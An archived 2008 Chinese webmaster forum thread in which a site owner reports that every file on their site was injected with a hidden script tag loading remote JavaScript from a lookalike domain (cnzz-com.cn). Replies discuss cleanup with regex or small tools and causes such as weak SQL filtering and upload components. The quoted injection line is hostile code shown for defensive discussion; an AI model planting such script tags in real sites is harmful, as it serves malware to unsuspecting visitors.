落伍者站长论坛's Archiver

Img 发表于 2008-4-20 22:59

现在这么怎么多牲畜喜欢在别人网站上挂木马啊

每个文件都插入代码了,

<script src=http://s48.cnzz-com.cn/6.js?id=***** namE='*****' height=0></Script>

后面还加了个name="",name还是不一样的数字,没法批量替换。

MD所有文件都挂了。
真是全家被狗CAO了。


:mad: :mad: :mad:

sidc 发表于 2008-4-21 10:00

先看下是否ARP,查下程序漏洞

小冰凉 发表于 2008-4-22 00:29

得删啊`~
是马~

lance 发表于 2008-4-22 00:42

可以批量的,定义前面一段为特征或者模糊查找,用VB写个小程序就搞定:ohh:

lns9406 发表于 2008-4-22 08:05

楼主太不幸了

美丽世界 发表于 2008-4-22 12:00

呵呵。。。安全没做好。。

spidergood 发表于 2008-4-25 00:32

搜索一下,落伍有朋友开发了专门针对这种[url]http://www.wesoho.com/article.asp?id=2384[/url]
在此之前,还没有专门的工具呢,感谢这个位朋友开发的这个工具

quanhaifeng 发表于 2008-4-25 15:04

鄙视挂马的人!

zwxman 发表于 2008-4-25 15:36

强烈鄙视

yangaiyan 发表于 2008-4-25 15:37

呵呵

安全没做好

spidergood 发表于 2008-4-25 21:45

挂马一般都是asp对sql语句的字符过滤不严造成,一般造成漏洞的都是 上传组件和在线编辑组件

飘香天梦 发表于 2008-4-27 13:47

挂马好搞钱啊。

Img 发表于 2008-4-28 16:22

我用正则先把name=""替换掉了 然后在批量删 :mad:
还要没有用最原始的方法手动删
要不就死翘翘了

小冰凉 发表于 2008-4-29 10:36

LZ其实很简单的,你不必全部删,只删一点,那条也就全部失效了
干吗不能批量。。。
还有可以通过那个地址找到幕后
可以的.....

小坏 发表于 2008-5-1 16:35

安全没做好还有挂马用的是批量挂马.倒~

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.